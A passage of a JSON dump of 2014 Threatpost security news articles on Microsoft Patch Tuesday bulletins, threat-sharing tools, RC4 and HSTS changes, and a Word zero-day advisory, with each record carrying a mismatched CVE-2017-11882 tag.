to become administrator of the machine to install their controlling malware. This is where these vulnerabilities come in \u2013 we consider these extremely important to fix to help frustrate or slow down attackers once they are on the target machine.\u201d\n\nMicrosoft has had a particularly newsworthy last 10 days, with the company involved in another [takedown of domains hosting malware](<http://threatpost.com/microsoft-says-technical-error-led-to-legitimate-no-ip-customers-losing-service/106977>), this time by No-IP, that also engulfed legitimate users forcing Microsoft to go back and hurriedly filter out those domains and restore them.\n\n_[Image courtesy Rainer Stropek ](<https://www.flickr.com/photos/rainerstropek/>)_\n", "cvss3": {}, "published": "2014-07-07T10:10:49", "type": "threatpost", "title": "July 2014 Microsoft Patch Tuesday Security Bulletins Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-07T14:10:49", "id": "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "href": "https://threatpost.com/expect-ie-rollup-azure-service-bus-update-on-patch-tuesday/107029/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Much like the Year of PKI that has never come to be, information sharing has been one of security\u2019s more infamous non-starters. While successful in heavily siloed environments such as financial services, enterprises industry-wide are hesitant to share threat and security data for fear of [losing a competitive edge](<http://threatpost.com/share-and-share-alike-not-quite/100916>) or exposing further vulnerabilities.\n\nMicrosoft hopes the latest tweak to its Microsoft Active Protections Program (MAPP) will calm the waters a bit and engage companies and industries to [share threat data](<http://threatpost.com/adequate-attack-data-and-threat-information-sharing-no-longer-luxury-111512/77221>) in an effort to stem the effects of targeted and persistent attacks and speed up incident response recovery.\n\nA private preview is scheduled to open this week for [Microsoft Interflow](<http://www.microsoft.com/interflow>), a distributed platform for information exchange that is built on open specifications such as the Structured Threat Information eXpression ([STIX](<https://stix.mitre.org/>)), the Trusted Automation eXchange of Indicator Information ([TAXII](<https://taxii.mitre.org/>)), and the Cyber Observable eXpression standards ([CybOX](<http://cybox.mitre.org/>)). Today\u2019s announcement comes 11 months after Microsoft expanded MAPP, its vendor partner [information-sharing program to include incident responders](<http://threatpost.com/microsoft-expands-mapp-program-to-incident-response-teams/101524>).\n\n\u201cWe realized when we were building [MAPP for IR] that we needed a better way to automate the exchange of information with partners,\u201d said Jerry Bryant, senior security strategic, Microsoft Security Response Center.\n\nInterflow is built in Microsoft\u2019s Azure cloud-based application hosting platform, and organizations can use its management console to subscribe to different threat feeds, build a community of trusted partners with whom to share data, and set trust levels on those relationships, Bryant said. A watchlist feature allows companies to filter the potential thousands of [indicators of attacks](<http://threatpost.com/defenders-still-chasing-adequate-threat-intelligence-sharing/102904>) and threats they may receive, and those indicators can be configured to feed directly into an intrusion detection system, firewall or endpoint protection system, Bryant said.\n\n\u201cThe system is designed for end-to-end automation. We have APIs that can be used to subscribe to and process feeds into endpoint protection. It\u2019s designed to integrate with investments you\u2019ve already made,\u201d Bryant said. \u201cIf you\u2019re using SIEM to do analysis, this, through a plug-in architecture, plugs into that console. You can use it also for additional sets of data or build sets of data that you can share back out with partners.\u201d\n\nWhile Interflow\u2019s extensibility allows for customization of the feeds it processes, it will arrive with a number of feeds provided by Microsoft as well, ranging from malicious URLs used in attack campaigns, to detection guidance that can help partners write signatures. Those companies will also have the option of sending telemetry data back to Microsoft based on hits against those signatures once they\u2019re deployed, Bryant said.\n\nInterflow is not the only sharing platform to support STIX and TAXII; Bryant said Interflow is meant to be complementary to many of those platforms, including established one-to-many systems such as those used by the Financial Services Information Sharing and Analysis Center ([FS-ISAC](<https://www.fsisac.com/>)).\n\n\u201cWe\u2019re making sure our system talks to theirs,\u201d Bryant said of ISACs. \u201cThey have valuable data sets for those communities and valuable information for us. We can send them indicators [of compromise] and they can send telemetry to us that improves our responses and drive decision-making for out-of-band patches, for example.\u201d\n\nTelemetry exchange is not required, however, Bryant said.\n\n\u201cCompanies will establish their own communities they want to share with. We want to be in their communities and we will make feeds available, but they don\u2019t\u2019 have to share back with us.\n\n\u201cWe talked to CISOs, and some don\u2019t like the idea of having to share their data back with a private organization. We don\u2019t require that; we just want to facilitate more sharing in the industry.\u201d\n\nBryant said anonymization and data sanitation capabilities are on the Interflow road map. For now, Microsoft has not set a general availability timeline for Interflow.\n\n\u201cPeople are getting more interested in sharing more of their own information. Obviously, there\u2019s a lot of hesitancy, but you can start out cautiously with Interflow and develop tight circles,\u201d Bryant said. \u201cThat\u2019s part of what we\u2019re trying to do is facilitate the next level of sharing and enable bidirectional sharing and connecting of systems. Our goal is to break down barriers and get more data flowing in the industry. Today, the way it works is not keeping up with threats.\u201d\n", "cvss3": {}, "published": "2014-06-23T09:03:23", "type": "threatpost", "title": "Microsoft Interflow Information-Sharing Platform Preview Open", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-24T13:04:01", "id": "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "href": "https://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. \u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which include further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s Patch Tuesday security updates.\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates.](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>) There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director, product management, Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may suggest it allows a message to be altered in transit,\u201d Barrett said. \u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:45", "description": "Microsoft today released its new [myBulletins](<http://blogs.technet.com/b/msrc/archive/2014/05/28/meet-mybulletins-an-online-security-bulletin-customization-service.aspx>) service, an interface where IT administrators can customize security patch update information.\n\nWhile providing users with a slick GUI that allows for extensive filtering of patch information by the products in use inside an enterprise or small company, some users were left hollow.\n\n\u201cFor me it was missing the two most important things: notifications and security advisories,\u201d said Andrew Storms, director of DevOps for CloudPassage.\n\nSecurity advisories differ from the roundup of monthly security bulletins that accompany Patch Tuesday security updates; advisories can warn users of zero-day vulnerabilities in Windows, Internet Explorer or other Microsoft software products. Other recent advisories provide administrators with a heads up regarding [changes in how Microsoft handles older encryption algorithms such as RC4](<http://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083>) or the [deprecation of older hashes such as MD5](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>).\n\nMicrosoft said myBulletins was built based on user feedback and enables administrators to personalize bulletins that matter most to their companies. Users need only log in using a Microsoft account and select the products and versions in use in their IT shops in order to get a display of the bulletins that apply to those products.\n\n\u201cYou shared that you needed the ability to cut through complexity and make decisions quickly,\u201d wrote Tracey Pretorius, director, Microsoft Trustworthy Computing. :You wanted help identifying the information that is most relevant to your organization. We heard you and acted on your feedback.\u201d\n\nUsers have a number of search and filtering options, Microsoft said, and can prioritize bulletins by release date, severity and reboot requirements.\n\nMany of those same options, however, are available in Windows Server Update Services (WSUS). Most organizations running a large number of Windows desktops and servers use WSUS to manage patch distribution.\n\n\u201cIt\u2019s not clear why I would use it over WSUS,\u201d Storms said. \u201cPlus WSUS provides me actionable [intelligence] on what systems need what patches. WSUS lets you select what products to subscribe to. It pulls patches, distributes them and tells you what systems need updates.\u201d\n\n\u201cmyBulletins is intended for IT professionals who are responsible for ongoing security specific update management within their organizations,\u201d Pretorius said. \u201cWe believe it is a useful online service for administrators in enterprise or small and medium sized business environments. This is the debut version of the online service and we welcome and appreciate feedback on how to make this service even better moving forward.\u201d\n\nThe lack of notifications is bothersome because users would have to load the myBulletins dashboard in order to learn if new security bulletins are available.\n\n\u201cGranted myBulletins is a slick search interface. It\u2019s hard to see why it would be useful if you already are using WSUS which is free,\u201d Storms said.\n\n_This article was updated at 5 p.m. ET with additional comments from Microsoft._\n", "cvss3": {}, "published": "2014-05-28T16:34:18", "type": "threatpost", "title": "Mixed Reviews on Microsoft myBulletins Patch Service", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-28T21:13:49", "id": "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "href": "https://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:50", "description": "Microsoft didn\u2019t beat around the bush when it [warned customers to stay away from the deprecated RC4 algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) last fall. Now it\u2019s giving those who use its .NET software framework an option to disable the cipher in Transport Layer Security (TLS) as well.\n\nIn a security advisory issued on its [Security TechCenter](<https://technet.microsoft.com/en-us/library/security/2960358>) yesterday, echoing its stance last year, Microsoft pointed out that using RC4 in TLS can give an attacker the ability to perform man-in-the-middle attacks and siphon away plaintext from encrypted sessions.\n\n[In November, Microsoft gave](<http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx>) those using Windows 7, Windows 8, Windows RT, Server 2008 R2, and Server 2012 the ability to disable the troublesome cipher. Now, six months later, the company is letting anyone running the latest version of .NET to do the same, through modifying the system registry. While .NET users looking to download the updates can find them at Microsoft\u2019s Download Center and Microsoft\u2019s Update Catalog, it\u2019s keeping the update off of Windows Update \u201cin order to give customers the ability to plan and test the new settings for disabling RC4 prior to implementation in their environments.\u201d\n\nRC4\u2019s faults have been well-documented. Now a quarter century old, the cipher is one of the older algorithms in use across the Internet today. With its usage has come an influx of practical attacks, many that can recover plaintext. [One such attack](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>), dug up last year by researcher and University of Illinois at Chicago professor Daniel J. Bernstein enabled an attacker to fully compromise a victim\u2019s session that\u2019s protected by TLS/RC4.\n\nThe advisory was one of three Microsoft issued yesterday.\n\n[The second](<https://technet.microsoft.com/en-us/library/security/2871997.aspx>) informed users that the company has tweaked a handful of its operating systems to better protect credentials and domain authentication controls. Updates to Windows 8, Windows RT, Server 2012, Windows 7, and Server 2008 R2 will now enforce stricter authentication policies. Microsoft is doing this by adding an extra layer of security to Local Security Authority (LSA), the interface that logs users onto local systems. The update also adds a new admin mode for its Credential Security Support Provider (CredSSP), a protocol that lets programs use client-side Security Support Provider APIs to assign user credentials from client computers to target servers. The update to CredSSP should prevent credentials from being harvested if the client ever winds up connecting to a compromised server.\n\nMicrosoft points out that while the updates should be beneficial for anyone running the aforementioned systems, they\u2019ll be most useful in enterprise environments where Windows domains are deployed.\n\nIn [the last advisory](<https://technet.microsoft.com/library/security/2962824>) Microsoft gave users a heads up that it went ahead and revoked the digital signatures for four third-party Unified Extensible Firmware Interface (UEFI) modules yesterday. The advisory is a bit vague, but claims the unnamed modules, which could be loaded during a Secure Boot, were not in compliance with the company\u2019s certification program. As the modules were private and third-party, not a whole lot more information was given but Microsoft claims the move was as part of its \u201congoing efforts to protect customers.\u201d\n\nAll advisories of course come on the heels of [yesterday\u2019s Patch Tuesday updates](<http://threatpost.com/microsoft-adobe-issue-critical-fixes-for-may-2014-patch-tuesday/106062>). The update addressed 13 issues, including critical vulnerabilities in IE and its Sharepoint Server software.\n", "cvss3": {}, "published": "2014-05-14T13:21:35", "type": "threatpost", "title": "Microsoft Giving .NET Users The Option to Shed RC4", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-05-14T17:21:35", "id": "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "href": "https://threatpost.com/microsoft-giving-net-users-the-option-to-shed-rc4/106083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, customization features older models and threat definitions, as well as a change to it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them, for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Microsoft confirmed today it will support HTTPS Strict Transport Protocol (HSTS) in Internet Explorer 12, bringing its browser in line with other major vendors in its support of the protocol.\n\nBrowsers supporting [HSTS](<https://tools.ietf.org/html/rfc6797>) force any sessions sent over HTTP to be sent instead over HTTPS, encrypting communication to and from a website.\n\nAccording to OWASP, HSTS protects users from a number of threats, in particular man-in-the-middle attacks by not only forcing encrypted sessions, but also stopping attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\nIE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.\n\nIE 12\u2019s support of HSTS puts it on an even keel with other browsers, some such as Chrome and Firefox have supported the protocol since 2011. Apple added HSTS support on Safari upon the release of Mavericks 10.9.\n\nAccording to the Electronic Frontier Foundation\u2019s [Encrypt the Web](<https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what>) report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others such as Facebook, LinkedIn, Tumblr, and Yahoo also plan to do so this year; Google too for select domains.\n\nEFF staff technologist Jeremy Gillula said today that developers either are unaware of the [availability of HSTS](<https://www.eff.org/deeplinks/2014/02/websites-hsts>), or have been stymied by incomplete support in browsers.\n\n\u201cThis is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,\u201d Gillula said. \u201cFor now, Internet Explorer doesn\u2019t support HSTS\u2014which means that there\u2019s basically no such thing as a secure website in IE.\u201d\n\nUntil that happens, much of the security burden falls on the user to either rely on a browser that supports HSTS, or use something such as the HTTPS Everywhere browser extension.\n\n\u201cFor now all a savvy user can do is to always carefully examine the address of the site you\u2019ve loaded, and verify that it\u2019s secure by checking to make sure it has \u201chttps\u201d in the front and is the precise address you want to visit,\u201d Gillula said. \u201cUnfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.\u201d\n\nSecure protocols such as HTTPS, HSTS and Perfect Forward Secrecy have been given greater priority now that the depths of NSA and government surveillance have been exposed. Experts urge developers to consider encryption technologies such as these a minimum standard for web-based services such as email.\n\nJust this week, Yahoo caught up to many of its contemporaries when it announced that it had [encrypted traffic moving between its data centers](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>); Snowden documents revealed that the NSA and Britain\u2019s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company\u2019s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.\n", "cvss3": {}, "published": "2014-04-04T15:41:30", "type": "threatpost", "title": "IE 12 to Support HSTS Encryption Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-09T18:05:31", "id": "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "href": "https://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "[As expected](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>), Microsoft issued its final epitaph for Windows XP today, pushing out four security bulletins for 11 vulnerabilities, including the last updates for the oft-maligned, thirteen-year-old operating system.\n\nDespite it being XP\u2019s last gasp from a security standpoint, it\u2019s actually a relatively light batch of [Patch Tuesday updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-apr>) this month. Two of the bulletins are branded critical and the other two important, but all of them can lead to remote code execution in their respective software, including recent versions of Word and some versions of Internet Explorer, if left unpatched.\n\nThe first critical patch (MS14-017) fixes a zero day first discovered last month in Microsoft Word. The patch fixes three vulnerabilities in total, chief among them the RTF memory corruption vulnerability that\u2019s been [discussed in depth](<http://threatpost.com/word-zero-day-attacks-use-complex-chain-of-exploits/105002>) over the past month. That bug could open the program up to remote code execution and let an attacker gain administrative rights if a specially crafted RTF file is either opened or previewed in Word or Outlook. [Microsoft first warned about the vulnerability](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) \u2013 first in an advisory last month, then in a Fix-It \u2013 after it discovered limited targeted attacks that used it for a vector in the wild. The exploit for the zero day, rather complex in nature, includes ASLR bypass, ROP techniques and shellcode with multiple mechanisms designed to circumvent analysis. In addition to the memory corruption bug, the patch also fixes two additional vulnerabilities; a file format converter vulnerability in Office and a stack overflow vulnerability in Word.\n\nThe Word issue is the only bug being patched today that\u2019s actively being exploited, so naturally experts are calling it the biggest priority of the four for service administrators.\n\n\u201cThis continues a trend we\u2019ve seen of Office-based exploits being successfully used in targeted attacks over the past few years,\u201d Marc Maiffret, the CTO of BeyondTrust said Tuesday. \u201cDeploy this patch as soon as possible to fix vulnerabilities in both Word and Office Web apps.\u201d\n\nThe second critical patch (MS14-018) also fixes a memory corruption bug, six of them to be exact, in most versions (6-9, 11) of Internet Explorer. Much like the Word vulnerability if a user were to stumble upon a malicious webpage an attacker could exploit the bug to execute code on the computer in the context of its current user. This vulnerability is one of two that affect components on XP, including IE 6 for those still running XP\u2019s Service Pack 3 and its Professional x64 Edition Service Pack 2.\n\nA previously disclosed file handling vulnerability (MS14-019) was also fixed by today\u2019s updates that could have allowed remote code execution in Windows. If left unpatched an attacker could trick a user to run a specially crafted .bat or .cmd file and gain command. While still important it\u2019s safe to say this vulnerability may be the least dangerous of today\u2019s patches as a user would have to be tempted to execute a batch file on a malicious network share. Still, this is the second issue that could affect users running some outdated versions of XP.\n\nThe last patch (MS14-020) addresses a hole that could open a machine up to remote code execution if someone were to open a specially crafted Microsoft Publisher file.\n\nWhile it may seem minor, Ross Barrett, Senior Manager of Security Engineering at Rapid7, is encouraging any firms that use the software on their system to prioritize the patch.\n\n\u201cI expect anyone who still works with it might actually be gullible enough to click on email attachments of Publisher documents,\u201d Barrett said of the vulnerability on Tuesday.\n\nOn top of the two bulletins that affect XP, both the Publisher issue and the Word issue figure into two bulletins that also affect Microsoft Word 2003, the final four updates for both XP and Office 2003.\n\nIf somehow you missed it, [Microsoft is ending support for XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>), Internet Explorer 6 and Office 2003 today, meaning this month\u2019s patches mark the last time the company will issue security updates for these products. While it\u2019s only a scant four bulletins, this makes April\u2019s Patch Tuesday an essential one for those who rely on the outdated platforms and apps.\n\nIt\u2019s assumed many admins are in the process of migrating off of XP \u2013 but it\u2019s likely they\u2019ll continue to have their hands full, not just with today\u2019s updates, but also recent updates from [Google](<http://threatpost.com/google-patches-four-pwn2own-bugs-in-chrome-33/104828>), [Mozilla](<http://threatpost.com/mozilla-patches-pwn2own-zero-days-in-firefox-28/104889>), [Apple](<http://threatpost.com/apple-fixes-more-than-25-flaws-in-safari/105197>) and other companies following last month\u2019s Pwn2Own competition.\n\n[It\u2019s widely expected](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) that a subset of attackers will ramp up exploits targeting XP after today and potentially examine patches for modern Windows 7 and 8 systems and adapt them to now no-longer supported XP machines.\n", "cvss3": {}, "published": "2014-04-08T15:52:10", "type": "threatpost", "title": "April Patch Tuesday Fixes 11 Vulnerabilities, Last Updates for XP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-11T18:53:10", "id": "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "href": "https://threatpost.com/last-call-for-xp-office-2003-updates-april-patch-tuesday-fixes-11-vulnerabilities/105329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:09", "description": "Targeted attacks have been spotted against a zero-day vulnerability in Microsoft Word 2010, leading Microsoft to issue a special [security advisory](<http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspx>) and produce a [Fix-it solution](<https://support.microsoft.com/kb/2953095>) for users until a patch is ready.\n\nMicrosoft also said that its Enhanced Mitigation Experience Toolkit (EMET) is a temporary mitigation for the zero-day. Some versions of EMET would have to be configured to work with Microsoft Office in order to ward off exploits; EMET 4.1 is already configured for Office, for example.\n\nWhile attacks are currently targeting Microsoft Word 2010, Microsoft said the vulnerability affects Word 2003, 2007, 2013 and 2013RT, as well as Office for Mac, Office Web Apps 2010 and 2013, and Word Viewer.\n\nAn attacker could exploit the vulnerability with a malicious Rich Text Format file or email in Outlook configured to use Microsoft Word as the email viewer, said Dustin Childs, a Trustworthy Computing group manager at Microsoft.\n\nThe vulnerability can also be exploited over the Web where an attacker could host a website containing a malicious RTF exploit, or upload a malicious RTF exploit onto a site that accepts user-provided content. Victims would have to be enticed into opening the content; an exploit cannot be triggered without user interaction.\n\nThe Fix it disables opening of RTF content in Word, Microsoft said.\n\n\u201cThe issue is caused when Microsoft Word parses specially crafted RTF-formatted data causing system memory to become corrupted in such a way that an attacker could execute arbitrary code,\u201d Microsoft said in its advisory, adding that Word is by default the email reader in Outlook 2007, 2010 and 2013.\n\nMicrosoft said it could release an out-of-band patch, but more likely it will wait until its next Patch Tuesday security updates are released on April 8. That date also signals the end of support for Windows XP, Microsoft announced some time ago.\n\nMicrosoft has made it a common practice to release Fix it mitigations or recommend the use of EMET as a temporary stopgap while zero-day vulnerabilities are being actively exploited in the wild. The last one issued was in February for a string of attacks against a [zero day in Internet Explorer](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCcQFjAA&url=http%3A%2F%2Fthreatpost.com%2Fmicrosoft-ships-fix-it-for-ie-10-zero-day%2F104383&ei=pH8wU-bhGcyGkQeZ7YDoBA&usg=AFQjCNGZPcpQBjYGur3Gsyg2qMm5Pwg--Q&bvm=bv.62922401,d.eW0&cad=rja>).\n\nThe vulnerability in IE 10 was exploited by [two different hacker groups](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>) against government and aerospace targets in the U.S. and France respectively. The same use-after-free vulnerability was present in IE 9 but was not being exploited.\n\nEMET has also been a popular mitigation recommendation from Microsoft against memory-based vulnerabilities. The toolkit contains a dozen mitigations that fend off buffer overflow attacks and others that allow attackers to execute code on vulnerable machines.\n\nMost recently, Microsoft released a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) that included two new exploit mitigations. Researchers, however, have been finding moderate success in developing [bypasses for some of the protections bundled in with EMET](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>).\n", "cvss3": {}, "published": "2014-03-24T15:20:55", "type": "threatpost", "title": "Microsoft Advisory Warns of Word Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-27T17:51:05", "id": "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "href": "https://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980/", "cvss": {"score": 9.3, "vector": 